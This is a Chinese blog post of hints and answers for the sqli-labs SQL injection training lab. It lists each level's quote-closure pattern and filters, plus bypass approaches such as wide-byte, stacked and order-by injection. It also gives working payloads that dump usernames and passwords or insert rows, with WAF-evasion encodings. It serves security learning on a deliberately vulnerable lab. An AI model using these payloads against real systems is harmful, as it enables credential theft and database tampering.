sqli-labs提示和答案(含详细教程)

最新推荐文章于 2024-06-07 07:48:16 发布
最新推荐文章于 2024-06-07 07:48:16 发布
阅读量1.6k 收藏 6
点赞数 3
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/superprintf/article/details/108861308
版权

1.参考资料部分

具体sqli-labs内容参考
链接1
或者更加全面的
注入天书pdf

2.总结部分

声明:页面显示的图片不总结

第1关到10关为GET注入

前四关登录成功显示用户名,失败报错正常
第1关id=‘1’
第2关id=1
第3关id=(‘1’)
第4关id=(“1”)
第5关和6关登录显示You are in…,失败报错正常
第5关id=‘1’
第6关id=“1”
第7-10关盲注
第7关id=((‘1’))
第8关id=‘1’
第9关id=‘1’
第10关id=“1”

第11关到16关为POST注入

第11关和12关登录成功显示用户名密码,失败报错正常
第11关username=‘admin’
第12关username=(‘admin’)
第13关和14关登录成功不显示,失败报错正常
第13关username=(‘admin’)
第14关username=“admin”
第15关16关盲注
第15关username=‘admin’
第16关username=(‘admin’)

17-22关的过滤

输入字符长度超过15的部分截断
字符串中\x00,\n,\r,\,',",\x1a被转义
纯数字的话被强制转换成整形

第17关username被过滤password=‘1’
第18,19,20,21关username和password都被过滤了
第18关,在http头useragent处注入,前提是成功登录
第19关,在http头Referer处注入,前提是登录成功
第20关,uname='cookie’注入
第21关,uname=(‘cookie’)加密注入
第22关,uname="cookie"加密注入

23关的过滤

-- 和 # 这两个注释符号

第23关id=‘admin’用闭合注入’ or ‘’=’

24关的过滤

\,",'

第24关二次注入

第25/25a关的过滤

and 和 or

第25关id=‘1’
第25a关登录失败不报错
第25a关id=1

第26/26a关的过滤

and,or,--,#,空格、制表符、换页符,/*,//

第26关id=‘1’
第26a关id=(‘1’)

第27关的过滤

--,/*,空格,#,大小写没过滤完全完全的select,union

第27关id=‘1’
第27a关没有报错
第27a关id=“1”

第28关的过滤

--,/*,/,空格,#,大小写完全过滤的union+\s+select

第28关id=(‘1’)
第28a关id=(‘1’) 只过滤union+\s+select组合

第29/30/31关

?id=被WAF过滤的部分&id=payload

第29关id=‘1’
第30关id=“1”
第31关id=(“1”)

第32-37关的过滤

',“,\

思路:宽字节注入

第38-45关

思路:堆叠注入(使用mysqli_multi_query导致的)
mysql基础命令

create table test select * from users;
drop table test;
select load_file('/Users/xjj/Desktop/eval');
insert into users(id,username,password) values('100','new','new');
update test set name='test' where id=3;

第38关id=‘1’
第39关id=1
第40关id=(‘1’)
第41关id=1

第42-45关:
login_user过滤 " / '
login_password='1'

第43关login_password=(‘1’)
第44关login_password=‘1’
第45关login_password=(‘1’)

第46-53关

思路:

order by和limit的注入
order by rand(true)随机排序
order by rand(false)与true不同
rand(),时间盲注,procedure analyse注入
into outfile "/Users/xjj/Desktop/new"

第46关order by $id
第47关order by ‘$id’
第48/49关盲注
第48关order by $id
第49关order by ‘$id’
第50/51关在46关基础上增加堆叠注入
第50关order by $id
第51关order by ‘$id’
第52/53关盲注
第52关order by $id
第53关order by ‘$id’

第54-65关

第54-57关和第1-4关一样但是讲究效率
第54关id=‘1’
第55关id=(1)
第56关id=(‘1’)
第57关id=“1”

第58-61关

union注入没有回显
第58关id=‘1’
第59关id=1
第60关id=(“1”)
第61关id=((‘1’))

第62-65关

盲注,用脚本

常用urlencode

! - %21
" - %22
# - %23
$ - %24
% - %25
& - %26
’ - %27
( - %28
) - %29
* - %2A
+ - %2B
, - %2C
- - %2D
. - %2E
/ - %2F
: - %3A
; - %3B
< - %3C
= - %3D
> - %3E
? - %3F
@ - %40
[ - %5B
\ - %5C
] - %5D
| - %7C
~ 0x7e
: 0x3a
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格

部分关卡的答案

25
?id=’ union select 1,(SELECT GROUP_CONCAT(username,passwoorrd SEPARATOORR 0x3c62723e) FROM users),3 anandd ‘1’=‘1
26关暂时没找到绕过\s正则的方法
27
?id=’%0bunIOn%0bseLEct%0b1,(SEleCT%0bGROUP_CONCAT(username,password%0bSEPARATOR%0b0x3c62723e)%0bFROM%0busers),3%0band%0b’1’=‘1
28
?id=’)%0bunion%0bunion%0bselectselect%0b1,(SELECT%0bGROUP_CONCAT(username,password%0bSEPARATOR%0b0x3c62723e)%0bFROM%0busers),3%0band%0b(‘1
29
id=2&id=’ union select 1,(SELECT GROUP_CONCAT(username,password SEPARATOR 0x3c62723e) FROM users),3 and ‘1’=‘1
32
?id=-1%df%27%20union%20select%201,user(),2–+
34:burpsuite
uname=%df%27%0bunion%0bselect%0b1,(SELECT%0bGROUP_CONCAT(username,password%0bSEPARATOR%0b0x3c62723e)%0bFROM%0busers)–+#&passwd=1&submit=Submit
35
?id=-1%20union%20select%201,2,3;–+
36
?id=-1%df%27union%20select%201,2,3;±-+#
37:burpsuite
uname=%df’+union+select+1,2;±-+#&passwd=1&submit=Submit
42burpsuite
login_user=admin&login_password=’+or+1=1;insert+into+users(username,password)+values(0x61,0x62);±-+#&mysubmit=Login

小健健健
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 1-65 详细分析
qq_43009954的博客
09-04 1752
这是sqli-labs靶场的通关讲解,希望能帮到你
sql-lab题解
qq_64584221的博客
04-08 407
zhiLess-1–基于单引号的字符型注入 初始界面: 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 我们给他一个id的传参 ?id=1 在id的之后面加 ’ 可判断是否有漏洞 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己...
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 827
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
[sqli-labs]Less1~22答案
MercyLin的博客
10-03 1067
Less-1 ?id=1' order by 3 #正常 ?id=1' order by 4 #Unknown column '4' in 'order clause' ?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+ # information_sch...
sqli-labs第一关:有回显位的提示信息注入
m0_51395584的博客
02-14 611
sqli-labs第一关:有回显位的提示信息注入 (一到四关的注入方式类似,只是SQL语句的闭合方式不同) 第一步:直接输入网址: 127.0.0.1/sqli-labs-master/Less-1/ 第二步:设置id=1,确定是否与数据库有交互 127.0.0.1/sqli-labs-master/Less-1/?id=1 第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示 http:
Sqli-labs第一题详解
未完成的歌~的博客
06-10 1966
less1: 根据题目提示为单引号注入,先测试一下 果然报错了,说明我们添加的单引号被数据库成功解析,那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 ...
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs-master.zip
05-21
标题 "sqli-labs-master.zip" 提供的信息表明,这个压缩包包的是一个与SQL注入(SQL Injection,简称SQLi)相关的实验平台的源代码。SQL注入是一种常见的网络安全漏洞,黑客利用这种漏洞可以对数据库进行非法操作...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL注入天书 sqli-labs
01-11
每个级别都有详细的说明和解题提示,帮助学习者理解漏洞的成因和利用方法,以及如何修复这些漏洞。通过这些实践,你可以学习到如何识别SQL注入点,如何构造有效的注入 payload,以及如何避免在自己的应用程序中引入...
RHEL-7搭建SQLi-Labs(Apache+MySQL+PHP).docx
06-15
【RHEL-7搭建SQLi-Labs(Apache...通过这些步骤,你将在RHEL-7系统上成功搭建SQLi-Labs,从而能够实践和学习各种SQL注入技巧,提高网络安全防御能力。同时,了解如何配置和管理LAMP环境也是对系统管理员技能的重要锻炼。
Sqli-labs学习第一题
Recar的博客
12-06 1772
很多东西了解一下,然后去用,总会遇到问题,一定不能浅尝辄止,要深入学习下,不能说说,要及时复习,要经常用才不会忘。 一直用 sqlmap,很少手工注入,但是很多时候不是别人写的工具就能解决的,要自己的工具适应不同的场景,编写自己的工具,那么首先要手工流程很熟悉才可以。 决定实践一遍 sqli-lab,还有各大平台的CTF都来一遍。 实践是检验真理的唯一标准http://localhost:90
sqli-labs解题大法1~10
weixin_43733035的博客
01-18 2329
有时在URL注入时,#不能起到注释作用,这时可以用–+来进行注释 sqli-labs/Less-1: 首先,输入/?id=1,发现页面正常。输入/?id=1’页面错误,在’后面加上–+注释之后页面正常,说明sql语句为id=’$id’,现在可以利用单引号闭合与–+注释来进行注入。 利用order by 进行排序来获得字段数,发现/?id=1’ order by 3–+页面正常,/?id=1’ or...
sqli-labs解题大法21~28a
weixin_43733035的博客
01-23 597
Less-21: 第21关,根据前面18关之后的经验,我决定先登录一下试试,然后… 瞬间爆炸了有木有,一堆英文完全看不懂啥意思,不过幸好有百度翻译, emmmm,好像没什么用,该没看懂还是没看懂,不过看到有user-agent和http,就决定先用' and union select 1,2,3#试一下,发现语句会直接输出,并没有注入。 然而,当我在cookie之中写payload时页面出现了...
sqli-labs解题大法11~17
weixin_43733035的博客
01-20 855
Less-11: 首先,进去页面之后发现是这样的 随便输入了一个之后发现报错 可以看出来这是用post方法传递的,我试了几次之后发现由单引号闭合,于是用命令admin’ or 1=1#,页面变化 可以看出来有两个显示位,用1=2令页面错误,使用admin’ or 1=2 order by 2#排序页面正常,admin’ or 1=2 order by 3#页面返回错误,所以有两个字段。接下来就可...
Sqli-Labs靶场(17--20)题解析
weixin_46099095的博客
03-14 4169
Less-17:POST - Update Query - Error Based - String(POST - 更新查询 - 基于错误 - 字符串) 这里无论我们在User Name栏输入什么除了正确的用户名admin,他都会报错,难道这题就没有注入点啦? 来,我们先看一下源码 左边是Less-16的源码,右边是Less-17的源码,看不懂每关系,我也看不懂,但是知道uname多了一个东
sqli-labs练习——sql注入
haoaaao的博客
01-29 1457
/*** 环境搭建 CSDNhttps://mp.csdn.net/mp_blog/creation/editor/122668696 ***/ 一、less-1 (1)题目让提交一个参数,没说是get参数还是post参数,那先尝试一下get参数 (2)首先触发网站的异常,如果触发异常了,说明网站存在sql注入漏洞,甚至可以通过报错信息,获取数据库的一些信息。 1)可以通过特殊字符进行尝试 (空格、#号需要url转义) 报如下异常 ...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs安装教程
07-28
对于sqli-labs的安装,您可以按照以下步骤进行操作: ...请注意,sqli-labs是一个教学平台,用于学习和实践SQL注入攻击和防御。在安装和使用过程中,请确保将其限制在您自己的环境中,遵守相关法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值